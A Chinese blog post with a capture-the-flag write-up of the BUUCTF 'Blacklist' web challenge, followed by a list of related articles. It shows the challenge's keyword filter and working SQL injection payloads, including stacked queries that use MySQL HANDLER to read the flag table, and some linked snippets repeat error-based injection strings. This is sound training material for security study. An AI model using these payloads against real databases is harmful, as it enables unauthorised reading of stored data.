BUUCTF-[GYCTF2020]Blacklist

最新推荐文章于 2024-08-23 17:37:15 发布
最新推荐文章于 2024-08-23 17:37:15 发布
阅读量253 收藏
点赞数 8
分类专栏: CTF-web 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61361405/article/details/133997440
版权

分析

 打开网页,提示是个黑名单。

右键查看源代码,啥也没有,那就尝试抓包吧。

没抓出什么东西,那就试试找注入点。

看到请求包,知道是get注入,那直接测试get请求

发现注入点,接下来查看列数

两列,接下来union联合查询

发现报错了,正则提示,select被禁用了

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|./i",$inject);

setpreparealterrenameselectupdatedeletedropinsertwhere\.(匹配一个点字符)

试过了大小写绕过,失败,那只能想想别的办法了

那只能试试堆叠注入了

堆叠注入的语法和在终端中使用查看数据库的语法相同

实战

查看数据库:

show databases;

查看表:

show tables;

查看FlagHere:

desc FlagHere;

发现FlagHere中是有内容的,那就构造payload:

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;

拿到flag

 总结

这题需要知道几个前置知识:

1、绕过select的方法
2、堆叠注入的语法:show、desc、handler

南欢richrich
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buuctf-Blacklist
m0_62094846的博客
03-28 658
?inject=1' order by 2--+ 过滤了很多关键词,就有select,好像绕不过 试试报错注入 ?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+ 数据库:surpersqli 因为过滤了太多,报错注入不了,只能试试别的了 堆叠注入 ?inject=-1';use supersqli;show tables--+ 查出两个表:FlagHere,words 接下来查字段...
BUUCTF-Blacklist
m0_47571887的博客
11-10 690
前言: 这道题我之前的文章攻防世界-supersqli是一道一样的,只不过这题是个进阶版,还有get了一个新的注入方式。 首先打开题目,看到查询框我们进行注入 禁用了很多东西啊,但貌似show没有禁用,可以查询一下数据库还有表 这里看到flaghere,但rename被禁用掉了,所以不能通过更改表名来进行查询,这里就要用一个其他得到注入方法 1';handler FlagHere open; //打开FlagHere文件 handler FlagHere read first;
buuctf blacklist
ANYOUZHEN的博客
05-26 305
这是一道sql注入题目,我们先来尝试对它进行闭合,payload:1' 使用联合查询,构造payload: ?inject=1' union select 1,2--+ 过滤了许多东西: /set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i 其中的select被过滤掉了 尝试使用报错注入进行突破: ?inject=1' and extractvalue(1,concat(0x7e,(databa..
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1387
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
BUUCTF:[GYCTF2020]Blacklist
末初的CSDN博客
11-09 448
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便注一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
express-jwt-blacklist:用于令牌黑名单的express-jwt插件
05-16
var blacklist = require ( 'express-jwt-blacklist' ) ; var app = express ( ) ; app . use ( jwt ( { secret : 'my-secret' , isRevoked : blacklist . isRevoked } ) ) ; app . get ( '/logout' , function ( ...
wordpress-comment-blacklist:WordPress评论垃圾邮件的简单解决方案
02-05
从压缩包 "wordpress-comment-blacklist-master" 中解压,你将得到项目的源代码。通常,这个项目会提供一个名为 `comment-blacklist.txt` 的文件,这是存储黑名单关键词的文本文件。 在使用前,你需要将 `comment-...
前端开源库-lws-blacklist
08-30
要使用`lws-blacklist`,首先需要将`blacklist-master`解压并集成到您的LWS项目中。这通常涉及到以下步骤: - 安装依赖:确保系统已经安装了libwebsockets库和必要的构建工具。 - 配置项目:在`CMakeLists.txt`或...
BlackOPs: RNA-Seq Variant Blacklist Tool:黑行动-开源
05-27
该页面包含必要的软件,用于表征RNA-Seq读段的可定位性,并创建错配读段的基因组位置的“黑名单”。 此黑名单可用于过滤来自变体或RNA编辑调用的潜在误报。 CR Cabanski等人在“ BlackOPs:通过可映射性过滤提高变异...
udev-joystick-blacklist:修复了Keyboardmousetablet在Linux中被检测为操纵杆的问题
05-16
udev-joystick-blacklist 修复了在Linux中将键盘/鼠标/平板电脑检测为操纵杆的问题。 尽管有一些设备被内核识别为操纵杆,但它们并不是操纵杆。 该存储库包含规则,这些规则将防止将非功能性的/dev/input/js*和/dev/...
[GYCTF2020]Blacklist
夜幕下的灯火阑珊的博客
05-12 891
知识点 堆叠注入 参考堆叠注入tips 查表名、列名、字段名 show databases; show tables; show columns from `table_name`; 本题使用HANDLER查看flag 1'; handler FlagHere open; handler FlagHere read first; handler FlagHere close;#
D3CTF2021-non-RCE
feng的博客
03-07 4182
non-RCE 前言 去年D3CTF的题目,最近刚复现完国赛的那道Java,感觉出题的思路也是魔改的这题,所以来复现一下这题。 password绕过 不谈代码了,因为审完之后思路还是比较清晰的,就是利用JDBC对AsjpectJWeaver反序列化写文件到classpath然后反序列化rce。 第一重过滤是这个: public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterCha
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 674
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 798
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
MySQL 相关知识笔记
最新发布
weixin_68929783的博客
08-23 804
以上是根据 B 站黑马课程学习后的 MySQL 笔记,为了日后复习和给别人参考而整理,希望对大家有所帮助。同时,在实际应用中,还需要根据具体情况合理使用索引、约束等功能,以提高数据库的性能和数据的完整性。
【达梦数据库】导入导出过程中get DDL复现过程
weixin_47686079的博客
08-20 329
在处理问题的过程中,客户反馈在达梦数据库中导入导出分区表,get 表的DDL,不会出现表的所有分区信息,ORACLE数据库却会出现所有分区表,事实真的如此吗?
redis常用操作命令
diffiii
08-21 189
显示服务器时间 , 时间戳(秒), 微秒数。模糊查询以fine为前缀的key值。模糊查询以ha为后缀的key值。删除指定key,多个用空格隔开。当前数据库key的数量。登录redis客户端。退出redis客户端。
分布式事务:基本概念
玉汝于成
08-20 296
事务可以看做事一次大的活动,它由不同的小的活动组成,这些活动要么全部成功,要么全部失败。
linux安装达梦数据库
HAN_789的博客
08-19 235
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
c语言实现提取出mac地址和ipv4地址:[connection] id=Wired Connection uuid=9726bc07-731c-abf1-9f57-bab17897f5af type=ethernet permissions= [ethernet] mac-address=02:02:03:04:05:06 mac-address-blacklist= [ipv4] address1=192.168.10.20/24 dns-search= method=manual [ipv6] addr-gen-mode=stable-privacy dns-search= method=auto [proxy]
06-06
可以使用C语言中的正则表达式库来提取出MAC地址和IPv4地址。以下是一个简单的示例代码: ```c #include <stdio.h> #include <regex.h> int main() { char* input = "[connection] id=Wired Connection uuid=9726bc07-731c-abf1-9f57-bab17897f5af type=ethernet permissions= [ethernet] mac-address=02:02:03:04:05:06 mac-address-blacklist= [ipv4] address1=192.168.10.20/24 dns-search= method=manual [ipv6] addr-gen-mode=stable-privacy dns-search= method=auto [proxy]"; regex_t regex; regmatch_t matches[2]; int status; // 匹配MAC地址 status = regcomp(&regex, "mac-address=([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})", REG_EXTENDED); if (status != 0) { printf("Failed to compile regex\n"); return 1; } status = regexec(&regex, input, 2, matches, 0); if (status == 0) { printf("MAC address: %.*s\n", (int)(matches[1].rm_eo - matches[1].rm_so), input + matches[1].rm_so); } else { printf("MAC address not found\n"); } regfree(&regex); // 匹配IPv4地址 status = regcomp(&regex, "address1=([0-9]{1,3}\\.){3}[0-9]{1,3}", REG_EXTENDED); if (status != 0) { printf("Failed to compile regex\n"); return 1; } status = regexec(&regex, input, 2, matches, 0); if (status == 0) { printf("IPv4 address: %.*s\n", (int)(matches[1].rm_eo - matches[1].rm_so), input + matches[1].rm_so); } else { printf("IPv4 address not found\n"); } regfree(&regex); return 0; } ``` 输出结果应该是: ``` MAC address: 02:02:03:04:05:06 IPv4 address: 192.168.10.20 ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值